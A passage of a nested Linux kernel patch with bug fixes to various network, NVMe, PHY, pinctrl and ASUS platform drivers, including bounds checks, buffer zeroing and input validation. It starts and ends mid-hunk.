++	tqavctrl = rd32(IGC_TQAVCTRL) & ~IGC_TQAVCTRL_FUTSCDDIS;
++
++	if (tqavctrl & IGC_TQAVCTRL_TRANSMIT_MODE_TSN)
++		tsn_mode_reconfig = true;
++
++	tqavctrl |= IGC_TQAVCTRL_TRANSMIT_MODE_TSN | IGC_TQAVCTRL_ENHANCED_QAV;
++
++	cycle = adapter->cycle_time;
++	base_time = adapter->base_time;
++
+ 	nsec = rd32(IGC_SYSTIML);
+ 	sec = rd32(IGC_SYSTIMH);
+ 
+ 	systim = ktime_set(sec, nsec);
+-
+ 	if (ktime_compare(systim, base_time) > 0) {
+-		s64 n;
++		s64 n = div64_s64(ktime_sub_ns(systim, base_time), cycle);
+ 
+-		n = div64_s64(ktime_sub_ns(systim, base_time), cycle);
+ 		base_time = ktime_add_ns(base_time, (n + 1) * cycle);
++
++		/* Increase the counter if scheduling into the past while
++		 * Gate Control List (GCL) is running.
++		 */
++		if ((rd32(IGC_BASET_H) || rd32(IGC_BASET_L)) &&
++		    (adapter->tc_setup_type == TC_SETUP_QDISC_TAPRIO) &&
++		    tsn_mode_reconfig)
++			adapter->qbv_config_change_errors++;
++	} else {
++		/* According to datasheet section 7.5.2.9.3.3, FutScdDis bit
++		 * has to be configured before the cycle time and base time.
++		 * Tx won't hang if there is a GCL is already running,
++		 * so in this case we don't need to set FutScdDis.
++		 */
++		if (igc_is_device_id_i226(hw) &&
++		    !(rd32(IGC_BASET_H) || rd32(IGC_BASET_L)))
++			tqavctrl |= IGC_TQAVCTRL_FUTSCDDIS;
+ 	}
+ 
+-	baset_h = div_s64_rem(base_time, NSEC_PER_SEC, &baset_l);
++	wr32(IGC_TQAVCTRL, tqavctrl);
+ 
++	wr32(IGC_QBVCYCLET_S, cycle);
++	wr32(IGC_QBVCYCLET, cycle);
++
++	baset_h = div_s64_rem(base_time, NSEC_PER_SEC, &baset_l);
+ 	wr32(IGC_BASET_H, baset_h);
++
++	/* In i226, Future base time is only supported when FutScdDis bit
++	 * is enabled and only active for re-configuration.
++	 * In this case, initialize the base time with zero to create
++	 * "re-configuration" scenario then only set the desired base time.
++	 */
++	if (tqavctrl & IGC_TQAVCTRL_FUTSCDDIS)
++		wr32(IGC_BASET_L, 0);
+ 	wr32(IGC_BASET_L, baset_l);
+ 
+ 	return 0;
+@@ -244,17 +274,14 @@ int igc_tsn_reset(struct igc_adapter *adapter)
+ 
+ int igc_tsn_offload_apply(struct igc_adapter *adapter)
+ {
+-	int err;
++	struct igc_hw *hw = &adapter->hw;
+ 
+-	if (netif_running(adapter->netdev)) {
++	if (netif_running(adapter->netdev) && igc_is_device_id_i225(hw)) {
+ 		schedule_work(&adapter->reset_task);
+ 		return 0;
+ 	}
+ 
+-	err = igc_tsn_enable_offload(adapter);
+-	if (err < 0)
+-		return err;
++	igc_tsn_reset(adapter);
+ 
+-	adapter->flags = igc_tsn_new_flags(adapter);
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/marvell/octeon_ep/octep_main.c b/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
+index 61354f7985035..e171097c13654 100644
+--- a/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
++++ b/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
+@@ -707,20 +707,19 @@ static netdev_tx_t octep_start_xmit(struct sk_buff *skb,
+ 		hw_desc->dptr = tx_buffer->sglist_dma;
+ 	}
+ 
+-	/* Flush the hw descriptor before writing to doorbell */
+-	wmb();
+-
+-	/* Ring Doorbell to notify the NIC there is a new packet */
+-	writel(1, iq->doorbell_reg);
++	netdev_tx_sent_queue(iq->netdev_q, skb->len);
++	skb_tx_timestamp(skb);
+ 	atomic_inc(&iq->instr_pending);
+ 	wi++;
+ 	if (wi == iq->max_count)
+ 		wi = 0;
+ 	iq->host_write_index = wi;
++	/* Flush the hw descriptor before writing to doorbell */
++	wmb();
+ 
+-	netdev_tx_sent_queue(iq->netdev_q, skb->len);
++	/* Ring Doorbell to notify the NIC there is a new packet */
++	writel(1, iq->doorbell_reg);
+ 	iq->stats.instr_posted++;
+-	skb_tx_timestamp(skb);
+ 	return NETDEV_TX_OK;
+ 
+ dma_map_sg_err:
+diff --git a/drivers/net/ethernet/marvell/sky2.h b/drivers/net/ethernet/marvell/sky2.h
+index ddec1627f1a7b..8d0bacf4e49cc 100644
+--- a/drivers/net/ethernet/marvell/sky2.h
++++ b/drivers/net/ethernet/marvell/sky2.h
+@@ -2195,7 +2195,7 @@ struct rx_ring_info {
+ 	struct sk_buff	*skb;
+ 	dma_addr_t	data_addr;
+ 	DEFINE_DMA_UNMAP_LEN(data_size);
+-	dma_addr_t	frag_addr[ETH_JUMBO_MTU >> PAGE_SHIFT];
++	dma_addr_t	frag_addr[ETH_JUMBO_MTU >> PAGE_SHIFT ?: 1];
+ };
+ 
+ enum flow_control {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+index c4e40834e3ff9..374c0011a127b 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+@@ -821,7 +821,7 @@ static void mlx5_fw_tracer_ownership_change(struct work_struct *work)
+ 
+ 	mlx5_core_dbg(tracer->dev, "FWTracer: ownership changed, current=(%d)\n", tracer->owner);
+ 	if (tracer->owner) {
+-		tracer->owner = false;
++		mlx5_fw_tracer_ownership_acquire(tracer);
+ 		return;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
+index cd15d36b1507e..907ad6ffe7275 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
+@@ -23,7 +23,8 @@ static int mlx5e_set_int_port_tunnel(struct mlx5e_priv *priv,
+ 
+ 	route_dev = dev_get_by_index(dev_net(e->out_dev), e->route_dev_ifindex);
+ 
+-	if (!route_dev || !netif_is_ovs_master(route_dev))
++	if (!route_dev || !netif_is_ovs_master(route_dev) ||
++	    attr->parse_attr->filter_dev == e->out_dev)
+ 		goto out;
+ 
+ 	err = mlx5e_set_fwd_to_int_port_actions(priv, attr, e->route_dev_ifindex,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+index 4b9d567c8f473..48939c72b5925 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+@@ -969,11 +969,8 @@ const u32 *mlx5_esw_query_functions(struct mlx5_core_dev *dev)
+ 	return ERR_PTR(err);
+ }
+ 
+-static void mlx5_eswitch_event_handlers_register(struct mlx5_eswitch *esw)
++static void mlx5_eswitch_event_handler_register(struct mlx5_eswitch *esw)
+ {
+-	MLX5_NB_INIT(&esw->nb, eswitch_vport_event, NIC_VPORT_CHANGE);
+-	mlx5_eq_notifier_register(esw->dev, &esw->nb);
+-
+ 	if (esw->mode == MLX5_ESWITCH_OFFLOADS && mlx5_eswitch_is_funcs_handler(esw->dev)) {
+ 		MLX5_NB_INIT(&esw->esw_funcs.nb, mlx5_esw_funcs_changed_handler,
+ 			     ESW_FUNCTIONS_CHANGED);
+@@ -981,13 +978,11 @@ static void mlx5_eswitch_event_handlers_register(struct mlx5_eswitch *esw)
+ 	}
+ }
+ 
+-static void mlx5_eswitch_event_handlers_unregister(struct mlx5_eswitch *esw)
++static void mlx5_eswitch_event_handler_unregister(struct mlx5_eswitch *esw)
+ {
+ 	if (esw->mode == MLX5_ESWITCH_OFFLOADS && mlx5_eswitch_is_funcs_handler(esw->dev))
+ 		mlx5_eq_notifier_unregister(esw->dev, &esw->esw_funcs.nb);
+ 
+-	mlx5_eq_notifier_unregister(esw->dev, &esw->nb);
+-
+ 	flush_workqueue(esw->work_queue);
+ }
+ 
+@@ -1273,6 +1268,9 @@ int mlx5_eswitch_enable_locked(struct mlx5_eswitch *esw, int num_vfs)
+ 
+ 	mlx5_eswitch_update_num_of_vfs(esw, num_vfs);
+ 
++	MLX5_NB_INIT(&esw->nb, eswitch_vport_event, NIC_VPORT_CHANGE);
++	mlx5_eq_notifier_register(esw->dev, &esw->nb);
++
+ 	if (esw->mode == MLX5_ESWITCH_LEGACY) {
+ 		err = esw_legacy_enable(esw);
+ 	} else {
+@@ -1285,7 +1283,7 @@ int mlx5_eswitch_enable_locked(struct mlx5_eswitch *esw, int num_vfs)
+ 
+ 	esw->fdb_table.flags |= MLX5_ESW_FDB_CREATED;
+ 
+-	mlx5_eswitch_event_handlers_register(esw);
++	mlx5_eswitch_event_handler_register(esw);
+ 
+ 	esw_info(esw->dev, "Enable: mode(%s), nvfs(%d), active vports(%d)\n",
+ 		 esw->mode == MLX5_ESWITCH_LEGACY ? "LEGACY" : "OFFLOADS",
+@@ -1394,7 +1392,8 @@ void mlx5_eswitch_disable_locked(struct mlx5_eswitch *esw)
+ 	 */
+ 	mlx5_esw_mode_change_notify(esw, MLX5_ESWITCH_LEGACY);
+ 
+-	mlx5_eswitch_event_handlers_unregister(esw);
++	mlx5_eq_notifier_unregister(esw->dev, &esw->nb);
++	mlx5_eswitch_event_handler_unregister(esw);
+ 
+ 	esw_info(esw->dev, "Disable: mode(%s), nvfs(%d), active vports(%d)\n",
+ 		 esw->mode == MLX5_ESWITCH_LEGACY ? "LEGACY" : "OFFLOADS",
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_ll2.c b/drivers/net/ethernet/qlogic/qed/qed_ll2.c
+index ed274f033626d..810df65cdf085 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_ll2.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_ll2.c
+@@ -113,7 +113,10 @@ static void qed_ll2b_complete_tx_packet(void *cxt,
+ static int qed_ll2_alloc_buffer(struct qed_dev *cdev,
+ 				u8 **data, dma_addr_t *phys_addr)
+ {
+-	*data = kmalloc(cdev->ll2->rx_size, GFP_ATOMIC);
++	size_t size = cdev->ll2->rx_size + NET_SKB_PAD +
++		      SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
++
++	*data = kmalloc(size, GFP_ATOMIC);
+ 	if (!(*data)) {
+ 		DP_INFO(cdev, "Failed to allocate LL2 buffer data\n");
+ 		return -ENOMEM;
+@@ -2590,7 +2593,7 @@ static int qed_ll2_start(struct qed_dev *cdev, struct qed_ll2_params *params)
+ 	INIT_LIST_HEAD(&cdev->ll2->list);
+ 	spin_lock_init(&cdev->ll2->lock);
+ 
+-	cdev->ll2->rx_size = NET_SKB_PAD + ETH_HLEN +
++	cdev->ll2->rx_size = PRM_DMA_PAD_BYTES_NUM + ETH_HLEN +
+ 			     L1_CACHE_BYTES + params->mtu;
+ 
+ 	/* Allocate memory for LL2.
+diff --git a/drivers/net/phy/bcm7xxx.c b/drivers/net/phy/bcm7xxx.c
+index 6cebf3aaa621f..dc5b27cb48fb0 100644
+--- a/drivers/net/phy/bcm7xxx.c
++++ b/drivers/net/phy/bcm7xxx.c
+@@ -907,6 +907,9 @@ static void bcm7xxx_28nm_remove(struct phy_device *phydev)
+ 	.name		= _name,					\
+ 	/* PHY_BASIC_FEATURES */					\
+ 	.flags		= PHY_IS_INTERNAL,				\
++	.get_sset_count	= bcm_phy_get_sset_count,			\
++	.get_strings	= bcm_phy_get_strings,				\
++	.get_stats	= bcm7xxx_28nm_get_phy_stats,			\
+ 	.probe		= bcm7xxx_28nm_probe,				\
+ 	.remove		= bcm7xxx_28nm_remove,				\
+ 	.config_init	= bcm7xxx_16nm_ephy_config_init,		\
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index 7544df1ff50ec..d373953ddc300 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -3056,10 +3056,11 @@ static long __tun_chr_ioctl(struct file *file, unsigned int cmd,
+ 	struct net *net = sock_net(&tfile->sk);
+ 	struct tun_struct *tun;
+ 	void __user* argp = (void __user*)arg;
+-	unsigned int ifindex, carrier;
++	unsigned int carrier;
+ 	struct ifreq ifr;
+ 	kuid_t owner;
+ 	kgid_t group;
++	int ifindex;
+ 	int sndbuf;
+ 	int vnet_hdr_sz;
+ 	int le;
+@@ -3115,7 +3116,9 @@ static long __tun_chr_ioctl(struct file *file, unsigned int cmd,
+ 		ret = -EFAULT;
+ 		if (copy_from_user(&ifindex, argp, sizeof(ifindex)))
+ 			goto unlock;
+-
++		ret = -EINVAL;
++		if (ifindex < 0)
++			goto unlock;
+ 		ret = 0;
+ 		tfile->ifindex = ifindex;
+ 		goto unlock;
+diff --git a/drivers/net/usb/smsc95xx.c b/drivers/net/usb/smsc95xx.c
+index 563ecd27b93ea..17da42fe605c3 100644
+--- a/drivers/net/usb/smsc95xx.c
++++ b/drivers/net/usb/smsc95xx.c
+@@ -897,7 +897,7 @@ static int smsc95xx_reset(struct usbnet *dev)
+ 
+ 	if (timeout >= 100) {
+ 		netdev_warn(dev->net, "timeout waiting for completion of Lite Reset\n");
+-		return ret;
++		return -ETIMEDOUT;
+ 	}
+ 
+ 	ret = smsc95xx_set_mac_address(dev);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+index 542cfcad6e0e6..2d01f6226b7c6 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+@@ -1585,6 +1585,7 @@ static void iwl_mvm_rx_tx_cmd_single(struct iwl_mvm *mvm,
+ 		iwl_trans_free_tx_cmd(mvm->trans, info->driver_data[1]);
+ 
+ 		memset(&info->status, 0, sizeof(info->status));
++		info->flags &= ~(IEEE80211_TX_STAT_ACK | IEEE80211_TX_STAT_TX_FILTERED);
+ 
+ 		/* inform mac80211 about what happened with the frame */
+ 		switch (status & TX_STATUS_MSK) {
+@@ -1936,6 +1937,8 @@ static void iwl_mvm_tx_reclaim(struct iwl_mvm *mvm, int sta_id, int tid,
+ 		 */
+ 		if (!is_flush)
+ 			info->flags |= IEEE80211_TX_STAT_ACK;
++		else
++			info->flags &= ~IEEE80211_TX_STAT_ACK;
+ 	}
+ 
+ 	/*
+diff --git a/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c b/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
+index 7351acac6932d..54ab8b54369ba 100644
+--- a/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
++++ b/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
+@@ -921,6 +921,14 @@ void mwifiex_11n_rxba_sync_event(struct mwifiex_private *priv,
+ 	while (tlv_buf_left >= sizeof(*tlv_rxba)) {
+ 		tlv_type = le16_to_cpu(tlv_rxba->header.type);
+ 		tlv_len  = le16_to_cpu(tlv_rxba->header.len);
++		if (size_add(sizeof(tlv_rxba->header), tlv_len) > tlv_buf_left) {
++			mwifiex_dbg(priv->adapter, WARN,
++				    "TLV size (%zu) overflows event_buf buf_left=%d\n",
++				    size_add(sizeof(tlv_rxba->header), tlv_len),
++				    tlv_buf_left);
++			return;
++		}
++
+ 		if (tlv_type != TLV_TYPE_RXBA_SYNC) {
+ 			mwifiex_dbg(priv->adapter, ERROR,
+ 				    "Wrong TLV id=0x%x\n", tlv_type);
+@@ -929,6 +937,14 @@ void mwifiex_11n_rxba_sync_event(struct mwifiex_private *priv,
+ 
+ 		tlv_seq_num = le16_to_cpu(tlv_rxba->seq_num);
+ 		tlv_bitmap_len = le16_to_cpu(tlv_rxba->bitmap_len);
++		if (size_add(sizeof(*tlv_rxba), tlv_bitmap_len) > tlv_buf_left) {
++			mwifiex_dbg(priv->adapter, WARN,
++				    "TLV size (%zu) overflows event_buf buf_left=%d\n",
++				    size_add(sizeof(*tlv_rxba), tlv_bitmap_len),
++				    tlv_buf_left);
++			return;
++		}
++
+ 		mwifiex_dbg(priv->adapter, INFO,
+ 			    "%pM tid=%d seq_num=%d bitmap_len=%d\n",
+ 			    tlv_rxba->mac, tlv_rxba->tid, tlv_seq_num,
+diff --git a/drivers/nvme/host/ioctl.c b/drivers/nvme/host/ioctl.c
+index 8224675f8de25..b33004a4bcb5a 100644
+--- a/drivers/nvme/host/ioctl.c
++++ b/drivers/nvme/host/ioctl.c
+@@ -32,9 +32,13 @@ static void *nvme_add_user_metadata(struct request *req, void __user *ubuf,
+ 	if (!buf)
+ 		goto out;
+ 
+-	ret = -EFAULT;
+-	if ((req_op(req) == REQ_OP_DRV_OUT) && copy_from_user(buf, ubuf, len))
+-		goto out_free_meta;
++	if (req_op(req) == REQ_OP_DRV_OUT) {
++		ret = -EFAULT;
++		if (copy_from_user(buf, ubuf, len))
++			goto out_free_meta;
++	} else {
++		memset(buf, 0, len);
++	}
+ 
+ 	bip = bio_integrity_alloc(bio, GFP_KERNEL, 1);
+ 	if (IS_ERR(bip)) {
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 64990a2cfd0a7..886c3fc9578e4 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3439,7 +3439,8 @@ static const struct pci_device_id nvme_id_table[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x0a54),	/* Intel P4500/P4600 */
+ 		.driver_data = NVME_QUIRK_STRIPE_SIZE |
+ 				NVME_QUIRK_DEALLOCATE_ZEROES |
+-				NVME_QUIRK_IGNORE_DEV_SUBNQN, },
++				NVME_QUIRK_IGNORE_DEV_SUBNQN |
++				NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_VDEVICE(INTEL, 0x0a55),	/* Dell Express Flash P4600 */
+ 		.driver_data = NVME_QUIRK_STRIPE_SIZE |
+ 				NVME_QUIRK_DEALLOCATE_ZEROES, },
+diff --git a/drivers/nvme/host/rdma.c b/drivers/nvme/host/rdma.c
+index c478480f54aa2..aa1734e2fd44e 100644
+--- a/drivers/nvme/host/rdma.c
++++ b/drivers/nvme/host/rdma.c
+@@ -643,6 +643,9 @@ static void __nvme_rdma_stop_queue(struct nvme_rdma_queue *queue)
+ 
+ static void nvme_rdma_stop_queue(struct nvme_rdma_queue *queue)
+ {
++	if (!test_bit(NVME_RDMA_Q_ALLOCATED, &queue->flags))
++		return;
++
+ 	mutex_lock(&queue->queue_lock);
+ 	if (test_and_clear_bit(NVME_RDMA_Q_LIVE, &queue->flags))
+ 		__nvme_rdma_stop_queue(queue);
+diff --git a/drivers/nvme/target/fabrics-cmd-auth.c b/drivers/nvme/target/fabrics-cmd-auth.c
+index 7970a7640e585..fbae76cdc2546 100644
+--- a/drivers/nvme/target/fabrics-cmd-auth.c
++++ b/drivers/nvme/target/fabrics-cmd-auth.c
+@@ -337,19 +337,21 @@ done:
+ 			 __func__, ctrl->cntlid, req->sq->qid,
+ 			 status, req->error_loc);
+ 	req->cqe->result.u64 = 0;
+-	nvmet_req_complete(req, status);
+ 	if (req->sq->dhchap_step != NVME_AUTH_DHCHAP_MESSAGE_SUCCESS2 &&
+ 	    req->sq->dhchap_step != NVME_AUTH_DHCHAP_MESSAGE_FAILURE2) {
+ 		unsigned long auth_expire_secs = ctrl->kato ? ctrl->kato : 120;
+ 
+ 		mod_delayed_work(system_wq, &req->sq->auth_expired_work,
+ 				 auth_expire_secs * HZ);
+-		return;
++		goto complete;
+ 	}
+ 	/* Final states, clear up variables */
+ 	nvmet_auth_sq_free(req->sq);
+ 	if (req->sq->dhchap_step == NVME_AUTH_DHCHAP_MESSAGE_FAILURE2)
+ 		nvmet_ctrl_fatal_error(ctrl);
++
++complete:
++	nvmet_req_complete(req, status);
+ }
+ 
+ static int nvmet_auth_challenge(struct nvmet_req *req, void *d, int al)
+@@ -527,11 +529,12 @@ void nvmet_execute_auth_receive(struct nvmet_req *req)
+ 	kfree(d);
+ done:
+ 	req->cqe->result.u64 = 0;
+-	nvmet_req_complete(req, status);
++
+ 	if (req->sq->dhchap_step == NVME_AUTH_DHCHAP_MESSAGE_SUCCESS2)
+ 		nvmet_auth_sq_free(req->sq);
+ 	else if (req->sq->dhchap_step == NVME_AUTH_DHCHAP_MESSAGE_FAILURE1) {
+ 		nvmet_auth_sq_free(req->sq);
+ 		nvmet_ctrl_fatal_error(ctrl);
+ 	}
++	nvmet_req_complete(req, status);
+ }
+diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
+index 5e29da94f72d6..355d80323b836 100644
+--- a/drivers/nvme/target/tcp.c
++++ b/drivers/nvme/target/tcp.c
+@@ -345,6 +345,7 @@ static void nvmet_tcp_fatal_error(struct nvmet_tcp_queue *queue)
+ 
+ static void nvmet_tcp_socket_error(struct nvmet_tcp_queue *queue, int status)
+ {
++	queue->rcv_state = NVMET_TCP_RECV_ERR;
+ 	if (status == -EPIPE || status == -ECONNRESET)
+ 		kernel_sock_shutdown(queue->sock, SHUT_RDWR);
+ 	else
+@@ -871,15 +872,11 @@ static int nvmet_tcp_handle_icreq(struct nvmet_tcp_queue *queue)
+ 	iov.iov_len = sizeof(*icresp);
+ 	ret = kernel_sendmsg(queue->sock, &msg, &iov, 1, iov.iov_len);
+ 	if (ret < 0)
+-		goto free_crypto;
++		return ret; /* queue removal will cleanup */
+ 
+ 	queue->state = NVMET_TCP_Q_LIVE;
+ 	nvmet_prepare_receive_pdu(queue);
+ 	return 0;
+-free_crypto:
+-	if (queue->hdr_digest || queue->data_digest)
+-		nvmet_tcp_free_crypto(queue);
+-	return ret;
+ }
+ 
+ static void nvmet_tcp_handle_req_failure(struct nvmet_tcp_queue *queue,
+diff --git a/drivers/phy/motorola/phy-mapphone-mdm6600.c b/drivers/phy/motorola/phy-mapphone-mdm6600.c
+index 3cd4d51c247c3..67802f9e40ba0 100644
+--- a/drivers/phy/motorola/phy-mapphone-mdm6600.c
++++ b/drivers/phy/motorola/phy-mapphone-mdm6600.c
+@@ -122,16 +122,10 @@ static int phy_mdm6600_power_on(struct phy *x)
+ {
+ 	struct phy_mdm6600 *ddata = phy_get_drvdata(x);
+ 	struct gpio_desc *enable_gpio = ddata->ctrl_gpios[PHY_MDM6600_ENABLE];
+-	int error;
+ 
+ 	if (!ddata->enabled)
+ 		return -ENODEV;
+ 
+-	error = pinctrl_pm_select_default_state(ddata->dev);
+-	if (error)
+-		dev_warn(ddata->dev, "%s: error with default_state: %i\n",
+-			 __func__, error);
+-
+ 	gpiod_set_value_cansleep(enable_gpio, 1);
+ 
+ 	/* Allow aggressive PM for USB, it's only needed for n_gsm port */
+@@ -160,11 +154,6 @@ static int phy_mdm6600_power_off(struct phy *x)
+ 
+ 	gpiod_set_value_cansleep(enable_gpio, 0);
+ 
+-	error = pinctrl_pm_select_sleep_state(ddata->dev);
+-	if (error)
+-		dev_warn(ddata->dev, "%s: error with sleep_state: %i\n",
+-			 __func__, error);
+-
+ 	return 0;
+ }
+ 
+@@ -456,6 +445,7 @@ static void phy_mdm6600_device_power_off(struct phy_mdm6600 *ddata)
+ {
+ 	struct gpio_desc *reset_gpio =
+ 		ddata->ctrl_gpios[PHY_MDM6600_RESET];
++	int error;
+ 
+ 	ddata->enabled = false;
+ 	phy_mdm6600_cmd(ddata, PHY_MDM6600_CMD_BP_SHUTDOWN_REQ);
+@@ -471,6 +461,17 @@ static void phy_mdm6600_device_power_off(struct phy_mdm6600 *ddata)
+ 	} else {
+ 		dev_err(ddata->dev, "Timed out powering down\n");
+ 	}
++
++	/*
++	 * Keep reset gpio high with padconf internal pull-up resistor to
++	 * prevent modem from waking up during deeper SoC idle states. The
++	 * gpio bank lines can have glitches if not in the always-on wkup
++	 * domain.
++	 */
++	error = pinctrl_pm_select_sleep_state(ddata->dev);
++	if (error)
++		dev_warn(ddata->dev, "%s: error with sleep_state: %i\n",
++			 __func__, error);
+ }
+ 
+ static void phy_mdm6600_deferred_power_on(struct work_struct *work)
+@@ -571,12 +572,6 @@ static int phy_mdm6600_probe(struct platform_device *pdev)
+ 	ddata->dev = &pdev->dev;
+ 	platform_set_drvdata(pdev, ddata);
+ 
+-	/* Active state selected in phy_mdm6600_power_on() */
+-	error = pinctrl_pm_select_sleep_state(ddata->dev);
+-	if (error)
+-		dev_warn(ddata->dev, "%s: error with sleep_state: %i\n",
+-			 __func__, error);
+-
+ 	error = phy_mdm6600_init_lines(ddata);
+ 	if (error)
+ 		return error;
+@@ -627,10 +622,12 @@ idle:
+ 	pm_runtime_put_autosuspend(ddata->dev);
+ 
+ cleanup:
+-	if (error < 0)
++	if (error < 0) {
+ 		phy_mdm6600_device_power_off(ddata);
+-	pm_runtime_disable(ddata->dev);
+-	pm_runtime_dont_use_autosuspend(ddata->dev);
++		pm_runtime_disable(ddata->dev);
++		pm_runtime_dont_use_autosuspend(ddata->dev);
++	}
++
+ 	return error;
+ }
+ 
+@@ -639,6 +636,7 @@ static int phy_mdm6600_remove(struct platform_device *pdev)
+ 	struct phy_mdm6600 *ddata = platform_get_drvdata(pdev);
+ 	struct gpio_desc *reset_gpio = ddata->ctrl_gpios[PHY_MDM6600_RESET];
+ 
++	pm_runtime_get_noresume(ddata->dev);
+ 	pm_runtime_dont_use_autosuspend(ddata->dev);
+ 	pm_runtime_put_sync(ddata->dev);
+ 	pm_runtime_disable(ddata->dev);
+diff --git a/drivers/pinctrl/core.c b/drivers/pinctrl/core.c
+index 27e41873c04ff..9e57f4c62e609 100644
+--- a/drivers/pinctrl/core.c
++++ b/drivers/pinctrl/core.c
+@@ -1007,20 +1007,17 @@ static int add_setting(struct pinctrl *p, struct pinctrl_dev *pctldev,
+ 
+ static struct pinctrl *find_pinctrl(struct device *dev)
+ {
+-	struct pinctrl *entry, *p = NULL;
++	struct pinctrl *p;
+ 
+ 	mutex_lock(&pinctrl_list_mutex);
+-
+-	list_for_each_entry(entry, &pinctrl_list, node) {
+-		if (entry->dev == dev) {
+-			p = entry;
+-			kref_get(&p->users);
+-			break;
++	list_for_each_entry(p, &pinctrl_list, node)
++		if (p->dev == dev) {
++			mutex_unlock(&pinctrl_list_mutex);
++			return p;
+ 		}
+-	}
+ 
+ 	mutex_unlock(&pinctrl_list_mutex);
+-	return p;
++	return NULL;
+ }
+ 
+ static void pinctrl_free(struct pinctrl *p, bool inlist);
+@@ -1129,6 +1126,7 @@ struct pinctrl *pinctrl_get(struct device *dev)
+ 	p = find_pinctrl(dev);
+ 	if (p) {
+ 		dev_dbg(dev, "obtain a copy of previously claimed pinctrl\n");
++		kref_get(&p->users);
+ 		return p;
+ 	}
+ 
+diff --git a/drivers/platform/surface/surface_platform_profile.c b/drivers/platform/surface/surface_platform_profile.c
+index fbf2e11fd6ce7..37c761f577149 100644
+--- a/drivers/platform/surface/surface_platform_profile.c
++++ b/drivers/platform/surface/surface_platform_profile.c
+@@ -159,8 +159,7 @@ static int surface_platform_profile_probe(struct ssam_device *sdev)
+ 	set_bit(PLATFORM_PROFILE_BALANCED_PERFORMANCE, tpd->handler.choices);
+ 	set_bit(PLATFORM_PROFILE_PERFORMANCE, tpd->handler.choices);
+ 
+-	platform_profile_register(&tpd->handler);
+-	return 0;
++	return platform_profile_register(&tpd->handler);
+ }
+ 
+ static void surface_platform_profile_remove(struct ssam_device *sdev)
+diff --git a/drivers/platform/x86/asus-nb-wmi.c b/drivers/platform/x86/asus-nb-wmi.c
+index d85d895fee894..df1db54d4e183 100644
+--- a/drivers/platform/x86/asus-nb-wmi.c
++++ b/drivers/platform/x86/asus-nb-wmi.c
+@@ -531,6 +531,9 @@ static void asus_nb_wmi_quirks(struct asus_wmi_driver *driver)
+ static const struct key_entry asus_nb_wmi_keymap[] = {
+ 	{ KE_KEY, ASUS_WMI_BRN_DOWN, { KEY_BRIGHTNESSDOWN } },
+ 	{ KE_KEY, ASUS_WMI_BRN_UP, { KEY_BRIGHTNESSUP } },
++	{ KE_KEY, 0x2a, { KEY_SELECTIVE_SCREENSHOT } },
++	{ KE_IGNORE, 0x2b, }, /* PrintScreen (also send via PS/2) on newer models */
++	{ KE_IGNORE, 0x2c, }, /* CapsLock (also send via PS/2) on newer models */
+ 	{ KE_KEY, 0x30, { KEY_VOLUMEUP } },
+ 	{ KE_KEY, 0x31, { KEY_VOLUMEDOWN } },
+ 	{ KE_KEY, 0x32, { KEY_MUTE } },
+diff --git a/drivers/platform/x86/asus-wmi.c b/drivers/platform/x86/asus-wmi.c
+index 36effe04c6f33..49dd55b8e8faf 100644
+--- a/drivers/platform/x86/asus-wmi.c
++++ b/drivers/platform/x86/asus-wmi.c
+@@ -3268,7 +3268,6 @@ static void asus_wmi_handle_event_code(int code, struct asus_wmi *asus)
+ {
+ 	unsigned int key_value = 1;
+ 	bool autorelease = 1;
+-	int orig_code = code;
+ 
+ 	if (asus->driver->key_filter) {
+ 		asus->driver->key_filter(asus->driver, &code, &key_value,
+@@ -3277,16 +3276,10 @@ static void asus_wmi_handle_event_code(int code, struct asus_wmi *asus)
+ 			return;
+ 	}
+ 
+-	if (code >= NOTIFY_BRNUP_MIN && code <= NOTIFY_BRNUP_MAX)
+-		code = ASUS_WMI_BRN_UP;
+-	else if (code >= NOTIFY_BRNDOWN_MIN && code <= NOTIFY_BRNDOWN_MAX)
+-		code = ASUS_WMI_BRN_DOWN;
+-
+-	if (code == ASUS_WMI_BRN_DOWN || code == ASUS_WMI_BRN_UP) {
+-		if (acpi_video_get_backlight_type() == acpi_backlight_vendor) {
+-			asus_wmi_backlight_notify(asus, orig_code);
+-			return;
+-		}
++	if (acpi_video_get_backlight_type() == acpi_backlight_vendor &&
